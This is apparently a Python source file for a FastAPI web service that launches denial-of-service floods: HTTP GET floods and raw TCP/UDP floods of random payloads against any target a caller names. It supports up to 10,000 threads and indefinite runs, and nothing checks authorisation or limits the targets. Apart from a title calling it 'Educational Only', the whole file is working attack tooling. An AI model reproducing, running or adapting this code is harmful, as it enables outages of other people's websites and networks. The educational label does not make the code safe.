|
|
|
|
|
import uvicorn |
|
|
from fastapi import FastAPI, HTTPException |
|
|
from pydantic import BaseModel, conint, constr |
|
|
import threading |
|
|
import requests |
|
|
import time |
|
|
import logging |
|
|
import socket |
|
|
import random |
|
|
from concurrent.futures import ThreadPoolExecutor |
|
|
|
|
|
logging.basicConfig(level=logging.INFO) |
|
|
logger = logging.getLogger(__name__) |
|
|
|
|
|
app = FastAPI(title="DDoS Testing Tool (Educational Only)") |
|
|
|
|
|
|
|
|
attack_active = False |
|
|
attack_thread = None |
|
|
executor = ThreadPoolExecutor(max_workers=10000) |
|
|
|
|
|
class Layer7Config(BaseModel): |
|
|
target: str |
|
|
port: int = 80 |
|
|
duration: int = 30 |
|
|
threads: int = 100 |
|
|
|
|
|
class Layer4Config(BaseModel): |
|
|
target: str |
|
|
port: int = 80 |
|
|
duration: int = 30 |
|
|
threads: int = 100 |
|
|
protocol: constr(regex='^(tcp|udp)$') = "tcp" |
|
|
payload_size: int = 1024 |
|
|
|
|
|
def generate_payload(size: int) -> bytes: |
|
|
"""Generate random payload for Layer 4 attacks""" |
|
|
return bytes(random.getrandbits(8) for _ in range(size)) |
|
|
|
|
|
def layer7_attack(target_url: str): |
|
|
headers = { |
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", |
|
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", |
|
|
"Connection": "keep-alive", |
|
|
"Cache-Control": "no-cache", |
|
|
"Pragma": "no-cache" |
|
|
} |
|
|
session = requests.Session() |
|
|
while attack_active: |
|
|
try: |
|
|
session.get(target_url, headers=headers, timeout=5, verify=False) |
|
|
except: |
|
|
pass |
|
|
|
|
|
def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int): |
|
|
sock = None |
|
|
try: |
|
|
if protocol == "tcp": |
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
|
|
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
|
|
sock.connect((target_ip, port)) |
|
|
else: |
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
|
|
|
|
|
while attack_active: |
|
|
payload = generate_payload(payload_size) |
|
|
if protocol == "tcp": |
|
|
sock.send(payload) |
|
|
else: |
|
|
sock.sendto(payload, (target_ip, port)) |
|
|
time.sleep(0.01) |
|
|
except Exception as e: |
|
|
logger.error(f"Layer 4 attack error: {e}") |
|
|
finally: |
|
|
if sock: |
|
|
sock.close() |
|
|
|
|
|
def start_layer7_attack(config: Layer7Config): |
|
|
global attack_active |
|
|
attack_active = True |
|
|
|
|
|
|
|
|
thread_count = config.threads if config.threads != -1 else 10000 |
|
|
|
|
|
|
|
|
protocol = "https" if config.target.startswith("https") else "http" |
|
|
target_url = f"{config.target}:{config.port}" |
|
|
logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads") |
|
|
|
|
|
for _ in range(thread_count): |
|
|
executor.submit(layer7_attack, target_url) |
|
|
|
|
|
|
|
|
if config.duration != -1: |
|
|
time.sleep(config.duration) |
|
|
stop_attack() |
|
|
else: |
|
|
logger.info("Layer 7 attack running indefinitely until manually stopped") |
|
|
|
|
|
def start_layer4_attack(config: Layer4Config): |
|
|
global attack_active |
|
|
attack_active = True |
|
|
|
|
|
|
|
|
thread_count = config.threads if config.threads != -1 else 10000 |
|
|
|
|
|
|
|
|
try: |
|
|
target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0]) |
|
|
except: |
|
|
raise HTTPException(status_code=400, detail="Invalid target URL") |
|
|
|
|
|
logger.info(f"Starting {config.protocol.upper()} attack on {target_ip}:{config.port} with {thread_count} threads") |
|
|
|
|
|
for _ in range(thread_count): |
|
|
executor.submit(layer4_attack, target_ip, config.port, config.protocol, config.payload_size) |
|
|
|
|
|
|
|
|
if config.duration != -1: |
|
|
time.sleep(config.duration) |
|
|
stop_attack() |
|
|
else: |
|
|
logger.info(f"{config.protocol.upper()} attack running indefinitely until manually stopped") |
|
|
|
|
|
def stop_attack(): |
|
|
global attack_active |
|
|
attack_active = False |
|
|
logger.info("Attack stopped.") |
|
|
|
|
|
@app.post("/layer7/attack") |
|
|
def launch_layer7_attack(config: Layer7Config): |
|
|
global attack_thread |
|
|
if attack_thread and attack_thread.is_alive(): |
|
|
raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
|
|
|
|
|
|
if config.threads != -1 and config.threads > 10000: |
|
|
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
|
|
|
|
|
|
if config.duration != -1 and config.duration > 5000: |
|
|
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
|
|
|
attack_thread = threading.Thread(target=start_layer7_attack, args=(config,), daemon=True) |
|
|
attack_thread.start() |
|
|
return {"status": "layer7_attack_started", "config": config} |
|
|
|
|
|
@app.post("/layer4/attack") |
|
|
def launch_layer4_attack(config: Layer4Config): |
|
|
global attack_thread |
|
|
if attack_thread and attack_thread.is_alive(): |
|
|
raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
|
|
|
|
|
|
if config.threads != -1 and config.threads > 10000: |
|
|
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
|
|
|
|
|
|
if config.duration != -1 and config.duration > 5000: |
|
|
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
|
|
|
|
|
|
if config.payload_size > 65507: |
|
|
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes") |
|
|
|
|
|
attack_thread = threading.Thread(target=start_layer4_attack, args=(config,), daemon=True) |
|
|
attack_thread.start() |
|
|
return {"status": f"{config.protocol}_attack_started", "config": config} |
|
|
|
|
|
@app.post("/stop") |
|
|
def stop(): |
|
|
stop_attack() |
|
|
return {"status": "attack_stopped"} |
|
|
|
|
|
@app.get("/status") |
|
|
def status(): |
|
|
return {"attack_active": attack_active} |
|
|
|
|
|
if __name__ == "__main__": |
|
|
uvicorn.run(app, host="0.0.0.0", port=8000) |
|
|
|